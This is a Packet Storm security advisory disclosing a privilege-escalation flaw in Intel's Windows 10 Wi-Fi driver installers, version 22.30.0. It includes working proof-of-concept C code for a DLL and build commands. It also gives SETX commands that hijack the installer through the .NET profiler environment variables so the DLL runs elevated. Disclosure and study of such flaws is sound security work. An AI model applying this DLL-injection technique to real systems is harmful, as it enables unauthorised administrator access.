what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation

Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation
Posted Apr 25, 2021
Authored by Stefan Kanthak

Windows 10 Wi-Fi Drivers For Intel Wireless Adapters version 22.30.0 suffer from a privilege escalation vulnerability.

tags | exploit
systems | windows
SHA-256 | 32a3533c7499f0b1656df4f46d4c4091cf67f7d914aa53d3ffec372e45979b20

Windows 10 Wi-Fi Drivers For Intel Wireless Adapters 22.30.0 Privilege Escalation

Change Mirror Download
Hi @ll,

the executable installers version 22.30.0 (Latest), published 2/23/2021,
for the "Windows® 10 Wi-Fi Drivers for Intel® Wireless Adapters",
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>,
available from
<https://downloadcenter.intel.com/download/30208/Windows-10-Wi-Fi-Drivers-for-Intel-Wireless-Adapters>
are (SURPRISE!) vulnerable: they allow arbitrary code execution WITH
local escalation of privilege.


CVSS 3.0 score: 8.2 (High)
CVSS 3.0 vector: 3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H


Demonstration:
~~~~~~~~~~~~~~

0. Log on with an arbitrary user account.

1. Save the following source as poc.c in an arbitrary directory:

--- poc.c ---
// Copyright (C) 2004-2021, Stefan Kanthak <stefan.kanthak@nexgo.de>

#define STRICT
#define UNICODE
#define WIN32_LEAN_AND_MEAN

#include <windows.h>

const STARTUPINFO si = {sizeof(si)};

__declspec(safebuffers)
BOOL WINAPI _DllMainCRTStartup(HANDLE hModule,
DWORD dwReason,
CONTEXT *lpContext)
{
WCHAR szCmdLine[] = L"CMD.exe /D /K WHOAMI.exe /ALL";

PROCESS_INFORMATION pi;
#if 0
if (dwReason != DLL_PROCESS_ATTACH)
return FALSE;
#endif
if (CreateProcess(NULL, szCmdLine, NULL, NULL, FALSE,
CREATE_DEFAULT_ERROR_MODE | CREATE_NEW_CONSOLE | CREATE_NEW_PROCESS_GROUP | CREATE_UNICODE_ENVIRONMENT,
NULL, NULL, &si, &pi))
{
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}

return TRUE;
}
--- EOF ---

2. Start the command prompt of the 32-bit Windows Software Development Kit,
then run the following command lines to compile poc.c and link it as
poc.dll:

CL.exe /Zl /W4 /Ox /GAFy /c poc.c
LINK.exe /LINK /DLL /DYNAMICBASE /ENTRY:_DllMainCRTStartup /NODEFAULTLIB /NXCOMPAT /OPT:REF /RELEASE /SUBSYSTEM:Windows poc.obj
kernel32.lib

ALTERNATIVE for steps 1 and 2:

2. Download <https://skanthak.homepage.t-online.de/download/SENTINEL.DLL>
and save it as poc.dll in an arbitrary directory.

See <https://skanthak.homepage.t-online.de/sentinel.html> for its
documentation, and
<https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html>
for an example how to use it.

3. Logon with the user account created during Windows setup.

4. Download
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver32_Win10.exe>
and
<https://downloadmirror.intel.com/30208/a08/WiFi_22.30.0_Driver64_Win10.exe>
and save them in an arbitrary directory.

5. Start a command prompt (UNELEVATED!) and run the following command lines
(replace <directory> with the pathname of the directory where you built
or saved poc.dll):

SETX.exe COR_ENABLE_PROFILING 1
SETX.exe COR_PROFILER {32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
SETX.exe COR_PROFILER_PATH <directory>\poc.dll

JFTR: this is just one method to set these environment variables without
the need to elevate!

6. Execute WiFi_22.30.0_Driver32_Win10.exe and WiFi_22.30.0_Driver64_Win10.exe
per double-click, acknowledge the UAC prompt, then admire the console
windows showing the output of WHOAMI.exe running elevated.


stay tuned, and far away from Intel's vulnerable crap!
Stefan Kanthak



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close